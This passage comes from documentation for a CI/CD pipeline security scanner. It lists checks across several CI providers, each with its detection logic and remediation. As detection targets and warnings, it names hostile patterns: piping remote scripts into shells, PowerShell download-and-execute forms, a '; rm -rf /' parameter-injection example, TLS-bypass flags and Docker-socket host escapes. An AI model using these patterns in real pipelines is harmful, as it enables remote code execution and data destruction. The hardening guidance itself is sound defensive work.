| CD-002 | AllAtOnce deployment config, no canary or rolling strategy | HIGH | AWS | |
| GL-004 | Deploy job lacks manual approval or environment gate | MEDIUM | GitLab CI | |
5.2.3: Ensure deployment environment activity is audited
Evidenced by 2 checks across AWS.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CD-003 | No CloudWatch alarm monitoring on deployment group | MEDIUM | AWS | |
| S3-004 | Artifact bucket access logging not enabled | LOW | AWS | |
Check details
Every check that evidences this standard, rendered once with its detection mechanism, recommendation, and any known false-positive modes or real-world incident references. The per-control tables above link to the matching block here.
ADO-001: Task reference not pinned to specific version HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Floating-major task references (@1, @2) can roll forward silently when the task publisher ships a breaking or malicious update. Pass when every task: reference carries a two- or three-segment semver.
Recommendation. Reference tasks by a full semver (DownloadSecureFile@1.2.3) or extension-published-version. Track task updates explicitly via Azure DevOps extension settings rather than letting @1 drift.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-001 in the Azure DevOps provider.
ADO-002: Script injection via attacker-controllable context HIGH
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. $(Build.SourceBranch*), $(Build.SourceVersionMessage), and $(System.PullRequest.*) are populated from SCM event metadata the attacker controls. Inline interpolation into a script body executes crafted content.
Recommendation. Pass these values through an intermediate pipeline variable declared with readonly: true, and reference that variable through an environment variable rather than $(...) macro interpolation. ADO expands $(…) before shell quoting, so inline use is never safe.
Source: ADO-002 in the Azure DevOps provider.
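A minimal sketch of the env-var route, assuming an illustrative script body (the readonly intermediate-variable form described above is the stricter variant of the same idea):

```yaml
steps:
  - script: |
      # The ref name arrives via the process environment, after shell
      # quoting, so a crafted branch name cannot inject commands.
      echo "Building branch: $SOURCE_BRANCH"
    env:
      SOURCE_BRANCH: $(Build.SourceBranch)  # macro expands into the env value, not the script text
```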
ADO-003: Variables contain literal secret values CRITICAL
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Scans variables: in both the mapping form ({KEY: VAL}) and the list form ([{name: X, value: Y}]) that ADO supports. AWS keys are detected by value shape regardless of variable name.
Recommendation. Store secrets in an Azure Key Vault or a Library variable group with the secret flag set; reference them via $(SECRET_NAME) at runtime. For cloud access prefer Azure workload identity federation.
Source: ADO-003 in the Azure DevOps provider.
ADO-004: Deployment job missing environment binding MEDIUM
Evidences: 5.1.4 Ensure deployment configuration manifests are reviewed before apply, 5.2.1 Ensure deployment environments are separated.
How this is detected. Without an environment: binding, ADO cannot enforce approvals, checks, or deployment history against a named resource. Every deployment: job should bind one.
Recommendation. Add environment: <name> to every deployment: job. Configure approvals, required branches, and business-hours checks on the matching Environment in the ADO UI.
Source: ADO-004 in the Azure DevOps provider.
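A minimal sketch of the binding; the environment name and deploy script are illustrative:

```yaml
jobs:
  - deployment: DeployWeb        # deployment job: records history and runs checks
    environment: production      # approvals and checks attach to this Environment in the ADO UI
    strategy:
      runOnce:
        deploy:
          steps:
            - script: ./deploy.sh
```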
ADO-005: Container image not pinned to specific version HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Container images can be declared at resources.containers[].image or job.container (string or {image:}). Floating / untagged refs let the publisher swap the image contents.
Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag. Avoid :latest and untagged refs.
Source: ADO-005 in the Azure DevOps provider.
ADO-006: Artifacts not signed MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Passes when cosign / sigstore / slsa-* / notation-sign appears anywhere in the pipeline text.
Recommendation. Add a task that runs cosign sign or notation sign; Azure Pipelines' workload identity federation enables keyless signing. Publish the signature to the artifact feed and verify it at deploy time.
Source: ADO-006 in the Azure DevOps provider.
ADO-007: SBOM not produced MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact.
Recommendation. Add an SBOM step: microsoft/sbom-tool, syft . -o cyclonedx-json, or anchore/sbom-action. Publish the SBOM as a pipeline artifact so downstream consumers can ingest it.
Source: ADO-007 in the Azure DevOps provider.
ARGO-001: Argo template container image not pinned to a digest HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Walks spec.templates[].container, spec.templates[].script, and spec.templates[].containerSet.containers[]. The image must contain @sha256: followed by a 64-char hex digest.
Recommendation. Pin every container / script template image to a content-addressable digest (alpine@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry update redirect the workflow's containers at the next pull, with no audit trail in the WorkflowTemplate.
Source: ARGO-001 in the Argo Workflows provider.
ARGO-002: Argo template container runs privileged or as root HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Detection fires on securityContext.privileged: true, runAsUser: 0, runAsNonRoot: false, allowPrivilegeEscalation: true, or no securityContext block at all. Also walks spec.podSpecPatch (raw YAML) for an explicit privileged: true token.
Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every template container / script. A privileged container shares the node's kernel namespaces; a malicious image then has root on the build node and breaks the boundary between workflow and cluster.
Source: ARGO-002 in the Argo Workflows provider.
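A hardened template sketch, with an illustrative image and command:

```yaml
spec:
  templates:
    - name: build
      container:
        image: alpine@sha256:<digest>   # pin to a digest per ARGO-001
        command: [make, build]
        securityContext:
          privileged: false
          runAsNonRoot: true
          allowPrivilegeEscalation: false
```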
ARGO-003: Argo workflow uses the default ServiceAccount MEDIUM
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Applies to Workflow and CronWorkflow. WorkflowTemplate / ClusterWorkflowTemplate are exempt because the SA is set on the run that references them. An explicit serviceAccountName: default is treated the same as omission.
Recommendation. Set spec.serviceAccountName (or spec.workflowSpec.serviceAccountName for CronWorkflow) to a least-privilege ServiceAccount that carries only the secrets and RBAC the workflow needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default, a privilege-escalation surface that should never be load-bearing for workflow pods.
Source: ARGO-003 in the Argo Workflows provider.
ARGO-004: Argo workflow mounts hostPath or shares host namespaces CRITICAL
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Walks spec.volumes[].hostPath and the raw spec.podSpecPatch string for hostNetwork, hostPID, hostIPC, and hostPath.
Recommendation. Use emptyDir or PVC-backed volumes instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true from any inline podSpecPatch. A hostPath mount of /var/run/docker.sock or / lets the workflow break out of the pod and act as the underlying node.
Source: ARGO-004 in the Argo Workflows provider.
ARGO-005: Argo input parameter interpolated unsafely in script / args CRITICAL
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. Fires on any {{inputs.parameters.X}}, {{workflow.parameters.X}}, or {{item.X}} token inside a script.source body or a container.args string that isn't already wrapped in quotes. Doesn't fire on the env-var indirection pattern, which is safe.
Recommendation. Don't interpolate {{inputs.parameters.<name>}} directly into script.source or container.args. Argo substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Pass the parameter via env: (value: '{{inputs.parameters.<name>}}') and reference the env var quoted in the script ("$NAME"); or use inputs.artifacts for file payloads.
Source: ARGO-005 in the Argo Workflows provider.
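A sketch of the safe env-var indirection; the template and parameter names are illustrative:

```yaml
templates:
  - name: greet
    inputs:
      parameters:
        - name: who
    script:
      image: alpine@sha256:<digest>
      command: [sh]
      env:
        - name: WHO
          value: '{{inputs.parameters.who}}'   # Argo substitutes into the env value, not the script text
      source: |
        echo "hello $WHO"                      # quoted env var: the shell never parses the raw parameter
```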
ARGO-006: Literal secret value in Argo template env or parameter default CRITICAL 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than an interpolation.
Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or arguments.parameters[].value. Workflow manifests are committed to git and cluster-readable; literal values leak through normal access paths.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ARGO-006 in the Argo Workflows provider.
ARGO-007: Argo workflow has no activeDeadlineSeconds LOW
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. Applies to Workflow, CronWorkflow, WorkflowTemplate, and ClusterWorkflowTemplate. The field can sit at the workflow level or on individual templates.
Recommendation. Set spec.activeDeadlineSeconds (or spec.workflowSpec.activeDeadlineSeconds on a CronWorkflow) so a hung step can't pin the workflow controller's reconcile cycle indefinitely. Pick a value generous enough for the slowest legitimate run (e.g. 3600 for a typical pipeline, 21600 for ML training). Per-template activeDeadlineSeconds is also accepted as evidence of intent.
Source: ARGO-007 in the Argo Workflows provider.
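A sketch showing both placements, using the values suggested above (image and template are illustrative):

```yaml
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: build-
spec:
  activeDeadlineSeconds: 3600       # workflow-level ceiling
  entrypoint: main
  templates:
    - name: main
      activeDeadlineSeconds: 600    # optional tighter per-template bound
      container:
        image: alpine@sha256:<digest>
        command: [make, build]
```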
ARGO-008: Argo script source pipes remote install or disables TLS HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Walks script.source and joined container.args text with the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes.
Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslverify false); install the missing CA into the template image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the workflow runs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ARGO-008 in the Argo Workflows provider.
ARGO-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Detection mirrors GHA-006 / TKN-009 / BK-009: the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in each Argo document. Fires only on artifact-producing Workflows / WorkflowTemplates (those that invoke docker build / docker push / kaniko / helm upgrade / aws s3 sync / etc.) so lint-only Workflows don't trip it.
Recommendation. Add a cosign step to the Workflow. The most common shape is a final sign template that runs cosign sign --yes <repo>@sha256:<digest> after the build. Sign by digest, not tag, so a re-pushed tag can't bypass the signature.
Source: ARGO-009 in the Argo Workflows provider.
ARGO-010: No SBOM generated for build artifacts MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Workflows.
Recommendation. Add an SBOM-generation template. syft <artifact> -o cyclonedx-json > /tmp/sbom.json runs in any standard container; cyclonedx-cli and cdxgen are alternative producers. Persist the SBOM as an output artifact so downstream templates and consumers can read it.
Source: ARGO-010 in the Argo Workflows provider.
ARGO-011: No SLSA provenance attestation produced MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked), 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, witness run, attest-build-provenance).
Recommendation. Add a cosign attest --predicate slsa.json --type slsaprovenance <ref> step after the build template, or use witness run to record the build environment. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: ARGO-011 in the Argo Workflows provider.
ARGO-012: No vulnerability scanning step MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec. Walks every Argo document and passes if any document includes a scanner reference.
Recommendation. Add a vulnerability scanner template. trivy fs /workdir for source / filesystem; trivy image <ref> for container images. grype, snyk, npm audit, pip-audit are alternatives. Fail the template on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: ARGO-012 in the Argo Workflows provider.
BB-001: pipe: action not pinned to exact version HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Bitbucket pipes are docker-image references. Major-only (:1) or missing tags let Atlassian/the publisher swap the image contents. Full semver or sha256 digest is required.
Recommendation. Pin every pipe: to a full semver tag (e.g. atlassian/aws-s3-deploy:1.4.0) or to an immutable SHA. Floating majors like :1 can roll to new code silently.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-001 in the Bitbucket provider.
BB-002: Script injection via attacker-controllable context HIGH
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. $BITBUCKET_BRANCH, $BITBUCKET_TAG, and $BITBUCKET_PR_* are populated from SCM event metadata the attacker controls. Interpolating them unquoted into a shell command lets a crafted branch or tag name execute inline.
Recommendation. Always double-quote interpolations of ref-derived variables ("$BITBUCKET_BRANCH"). Avoid passing them to eval, sh -c, or unquoted command arguments.
Source: BB-002 in the Bitbucket provider.
BB-003: Variables contain literal secret values CRITICAL
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Scans definitions.variables and each step's variables: for entries whose KEY looks credential-shaped and whose VALUE is a literal string. AWS access keys are detected by value shape regardless of key name.
Recommendation. Store credentials as Repository / Deployment Variables in Bitbucket's Pipelines settings with the 'Secured' flag, and reference them by name. Prefer short-lived OIDC tokens for cloud access.
Source: BB-003 in the Bitbucket provider.
BB-004: Deploy step missing deployment: environment gate MEDIUM
Evidences: 5.1.4 Ensure deployment configuration manifests are reviewed before apply, 5.2.1 Ensure deployment environments are separated.
How this is detected. A step whose name or invoked pipe matches deploy / release / publish / promote should declare a deployment: field so Bitbucket enforces deployment-scoped variables, approvals, and history.
Recommendation. Add deployment: production (or staging / test) to the step. Configure the matching environment in the repo's Deployments settings with required reviewers and secured variables.
Source: BB-004 in the Bitbucket provider.
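A sketch of a gated step; the branch, environment name, and script are illustrative:

```yaml
pipelines:
  branches:
    main:
      - step:
          name: Deploy to production
          deployment: production    # binds approvals, deployment-scoped variables, and history
          script:
            - ./deploy.sh
```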
BB-005: Step has no max-time, unbounded build MEDIUM 🔧 fix
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. Without max-time, the step runs until Bitbucket's 120-minute global default kills it. Explicit per-step timeouts cap blast radius and cost.
Recommendation. Add max-time: <minutes> to each step, sized to the 95th percentile of historical runtime plus margin. Bounded runs limit the blast radius of a compromised build and prevent runaway minute consumption.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-005 in the Bitbucket provider.
BB-006: Artifacts not signed MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Unsigned artifacts can't be verified downstream. Passes when cosign / sigstore / slsa-* / notation-sign appears in the pipeline body.
Recommendation. Add a step that runs cosign sign against the built image or archive, using Bitbucket OIDC for keyless signing where possible. Publish the signature next to the artifact and verify it at deploy time.
Source: BB-006 in the Bitbucket provider.
BB-007: SBOM not produced MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact. Passes when CycloneDX / syft / anchore / sbom-tool / Trivy-SBOM appears.
Recommendation. Add an SBOM step: syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM as a build artifact.
Source: BB-007 in the Bitbucket provider.
BK-001: Buildkite plugin not pinned to an exact version HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Buildkite resolves plugin refs at agent boot. foo#v1.2.3 locks the version; foo#main / foo does not. Detection fires on bare names, branch keywords, and partial-semver pins (v4, v4.13).
Recommendation. Pin every plugin reference to an exact tag (docker-compose#v4.13.0) or a 40-char commit SHA. Bare references (docker-compose), branch refs (#main / #master), and major-only floats (#v4) resolve to whatever is current at agent start time, which lets a compromised plugin release execute inside the pipeline.
Source: BK-001 in the Buildkite provider.
BK-002: Literal secret value in pipeline env block CRITICAL 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Detection fires on values that look like AWS access keys, GitHub PATs, OpenAI keys, JWTs, or generic high-entropy tokens, plus on env-var names that imply a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) when the value is a non-empty literal rather than an interpolation ($SECRET_FROM_AGENT_HOOK).
Recommendation. Move the value out of the pipeline file. Use Buildkite's agent secrets hooks (secrets/ directory or BUILDKITE_PLUGIN_AWS_SSM_*), the aws-ssm / vault-secrets plugins, or the BUILDKITE_PIPELINE_DEFAULT_BRANCH env var pulled from a secret manager. The pipeline.yml is committed to the repo and visible to anyone with read access.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-002 in the Buildkite provider.
BK-003: Untrusted Buildkite variable interpolated in command HIGH
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. Buildkite passes branch / tag / message metadata as environment variables. Putting them inside $(...) or shelling out with the value unquoted is a classic command-injection vector. The detection fires on the unquoted interpolation form and on use inside eval / $(...).
Recommendation. Don't interpolate $BUILDKITE_BRANCH, $BUILDKITE_TAG, $BUILDKITE_MESSAGE, $BUILDKITE_PULL_REQUEST_*, or $BUILDKITE_BUILD_AUTHOR* directly into shell commands. These come from the pull request / branch and are attacker-controllable. Quote them and assign to a local variable first (branch="$BUILDKITE_BRANCH"; ./script --branch "$branch"), or pass them as arguments to a script you own.
Source: BK-003 in the Buildkite provider.
BK-004: Remote script piped into shell interpreter HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. The detection fires on curl|bash, curl|sh, wget|bash, iex (iwr ...), and the corresponding Invoke-WebRequest|Invoke-Expression PowerShell forms. Use curl -fsSLO <url>; sha256sum -c install.sh.sha256; bash install.sh instead.
Recommendation. Download the installer to disk, verify a checksum or signature, then execute it. curl ... | sh lets the remote host change what runs in your pipeline at any time, and any TLS / DNS error during download silently feeds a partial script to the shell.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-004 in the Buildkite provider.
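A sketch of the download-then-verify-then-execute pattern as a Buildkite step; the URL and checksum are illustrative placeholders:

```yaml
steps:
  - label: ":inbox_tray: install tool"
    command: |
      # fetch to disk first; nothing executes until the digest matches
      curl -fsSLO https://example.com/install.sh
      echo "<expected-sha256>  install.sh" | sha256sum -c -
      bash install.sh
```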
BK-005: Container started with --privileged or host-bind escalation HIGH 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Detection fires on --privileged, --cap-add=SYS_ADMIN, --pid=host / --ipc=host / --userns=host, and explicit mounts of the host Docker socket (/var/run/docker.sock).
Recommendation. Drop --privileged, --cap-add=SYS_ADMIN, --pid=host, and -v /var/run/docker.sock from container invocations. If the workload needs Docker-in-Docker, use a build-specific rootless option (buildx, kaniko, buildah --isolation=chroot) instead of opening the host kernel and the agent's Docker socket to the build script.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-005 in the Buildkite provider.
BK-006: Step has no timeout_in_minutes LOW
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. Buildkite has no implicit timeout; agents will wait forever. Set timeout_in_minutes: per step. The pipeline-level default counts: a global steps: block with timeout_in_minutes: is fine, since Buildkite copies it to each step.
Recommendation. Set timeout_in_minutes: on every command step. A compromised dependency or a hung test can otherwise hold an agent indefinitely, blocking parallel pipelines and running up self-hosted-runner cost. Pick a value generous enough for the slowest legitimate run (e.g. 30 for a typical build, 90 for an integration suite).
Known false positives.
- Steps that genuinely need >24h (rare: database migrations, ML training jobs). Set timeout_in_minutes: 1440 explicitly so the generous limit is visibly intentional rather than an omission.
Source: BK-006 in the Buildkite provider.
BK-007: Deploy step not gated by a manual block / input MEDIUM
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution, 5.1.4 Ensure deployment configuration manifests are reviewed before apply.
How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship, release, promote, apply, rollout, terraform apply, kubectl apply, helm upgrade, aws ecs update-service). The check passes when at least one preceding step in the same pipeline file is a block: or input: flow-control step.
Recommendation. Insert a - block: "Deploy?" (or - input: step) in front of every deploy step. Buildkite waits for a human to click Unblock before the gated steps run, which prevents an unreviewed merge from auto-deploying to production. Combine with branches: main so the gate only appears on release branches.
Known false positives.
- Pipelines where the deploy gate lives in a triggered pipeline rather than the local file: the local pipeline looks ungated even though the actual deploy is gated downstream. Add a no-op block: to silence the finding.
Source: BK-007 in the Buildkite provider.
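A sketch of the gate; labels and commands are illustrative:

```yaml
steps:
  - label: ":hammer: build"
    command: make build
  - block: "Deploy to production?"   # waits for a human to click Unblock
    branches: main                   # gate appears only on the release branch
  - label: ":rocket: deploy"
    command: ./deploy.sh
```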
BK-008: TLS verification disabled in step command MEDIUM 🔧 fix
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Detection fires on the canonical bypass flags across curl, wget, git, npm, pip, gcloud, and openssl. The check is deliberately conservative; partial-word matches (--insecure-protocols) are excluded.
Recommendation. Drop curl -k / --insecure, wget --no-check-certificate, git -c http.sslVerify=false, and pip install --trusted-host. If a CA isn't trusted, install it into the agent's trust store (update-ca-certificates) rather than disabling validation pipeline-wide. A compromised intermediate that strips TLS gets a free hand with every fetch the step performs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-008 in the Buildkite provider.
BK-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Unsigned artifacts can't be verified downstream; a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools, matching the shared signing-token catalog used by the other CI packs.
Recommendation. Add a signing step: install cosign once (brew install cosign in the agent image, or a cosign-install plugin) and call cosign sign --yes <ref> after the build. For container images pushed to ECR / GCR / GHCR, the same call signs by digest. Publish the signature alongside the artifact and verify it at consumption time.
Source: BK-009 in the Buildkite provider.
BK-010: No SBOM generated for build artifacts MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool.
Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > sbom.json runs in any standard agent image; cyclonedx-cli and cdxgen are alternative producers. Upload the SBOM via buildkite-agent artifact upload so downstream consumers (and incident-response tooling) can match deployed artifacts to the components they were built from.
Source: BK-010 in the Buildkite provider.
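A sketch of the SBOM step; the artifact path is illustrative:

```yaml
steps:
  - label: ":clipboard: sbom"
    command: |
      syft dist/app.tar -o cyclonedx-json > sbom.json
      buildkite-agent artifact upload sbom.json   # downstream consumers fetch it from the build
```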
BK-011: No SLSA provenance attestation produced MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked), 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Without it, a leaked signing key forges identity but a leaked build environment also forges provenance. You need both for the SLSA L3 non-falsifiability guarantee. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance).
Recommendation. Run cosign attest --predicate slsa.json (or the SLSA-framework generator from a build-time step) after the build completes. The predicate records the build inputs and the agent that produced the artifact. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: BK-011 in the Buildkite provider.
BK-012: No vulnerability scanning step MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, anchore, dependency-check, checkov, semgrep.
Recommendation. Add a vulnerability scanner: trivy fs . for source / filesystem, trivy image <ref> for container images, grype and snyk for either. Add npm audit / pip-audit for language-specific dep audits. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: BK-012 in the Buildkite provider.
CB-001: Secrets in plaintext environment variables CRITICAL
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Flags a plaintext env var when either (a) its name matches a secret-like pattern (PASSWORD, TOKEN, API_KEY, ...) or (b) its value matches a known credential shape (AKIA/ASIA access keys, GitHub tokens, Slack xox* tokens, JWTs). Plaintext values are visible in the AWS console, CloudTrail, and build logs to anyone with read access.
Recommendation. Move secrets to AWS Secrets Manager or SSM Parameter Store and reference them using type SECRETS_MANAGER or PARAMETER_STORE in the CodeBuild environment variable configuration.
Source: CB-001 in the AWS provider.
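A buildspec sketch of the Secrets Manager / Parameter Store indirection; the secret names and paths are illustrative:

```yaml
version: 0.2
env:
  secrets-manager:
    DB_PASSWORD: prod/db:password     # <secret-id>:<json-key>
  parameter-store:
    API_TOKEN: /myapp/api_token
phases:
  build:
    commands:
      - ./build.sh   # values resolve at build time; nothing is committed to the repo
```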
CB-002: Privileged mode enabled HIGH
Evidences: 2.1.3 Ensure the build environment is hardened, 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Privileged mode grants the build container root access to the host's Docker daemon. A compromised build can escape the container or tamper with the host. Only flip this on for real Docker-in-Docker workloads and keep the buildspec under branch-protected review.
Recommendation. Disable privileged mode unless the project explicitly requires Docker-in-Docker builds. If required, ensure the buildspec is tightly controlled, peer-reviewed, and sourced from a trusted repository with branch protection.
Source: CB-002 in the AWS provider.
CB-003: Build logging not enabled MEDIUM
Evidences: 2.3.7 Ensure pipeline steps produce audit logs.
How this is detected. A CodeBuild project with neither CloudWatch Logs nor S3 logging enabled leaves no durable record of what the build did. The CodeBuild console shows the last execution's logs for a short retention window, but anything older, and any automated review of historical activity during incident response, is gone.
Recommendation. Enable CloudWatch Logs or S3 logging in the CodeBuild project configuration to maintain a durable audit trail of all build activity.
Source: CB-003 in the AWS provider.
CB-004: No build timeout configured LOW
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. A CodeBuild project at AWS's 480-minute maximum is rarely deliberate. Without a tighter ceiling, a runaway test loop, a fork-PR cryptomining payload, or a build that hangs on stdin keeps the build host (and its IAM role) live for the full eight hours, racking up cost and extending the compromise window.
Recommendation. Set a build timeout appropriate for your expected build duration (typically 15–60 minutes) to limit the blast radius of a runaway or abused build.
Source: CB-004 in the AWS provider.
CB-005: Outdated managed build image MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 2.1.3 Ensure the build environment is hardened.
How this is detected. Only AWS-managed aws/codebuild/standard:N.0 images are version-checked. Custom or third-party images pass here; CB-009 handles the separate concern of tag vs digest pinning for custom images.
Recommendation. Update the CodeBuild environment image to aws/codebuild/standard:7.0 or later to ensure the build environment receives the latest security patches.
Known false positives.
- One version behind the current aws/codebuild/standard is a hygiene warning, not a production issue, and defaults to MEDIUM confidence. The rule emits HIGH only when the project is two or more versions behind. Custom or third-party images are not version-checked here; CB-009 handles tag-vs-digest pinning for those.
Source: CB-005 in the AWS provider.
CB-006: CodeBuild source auth uses long-lived token HIGH
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens).
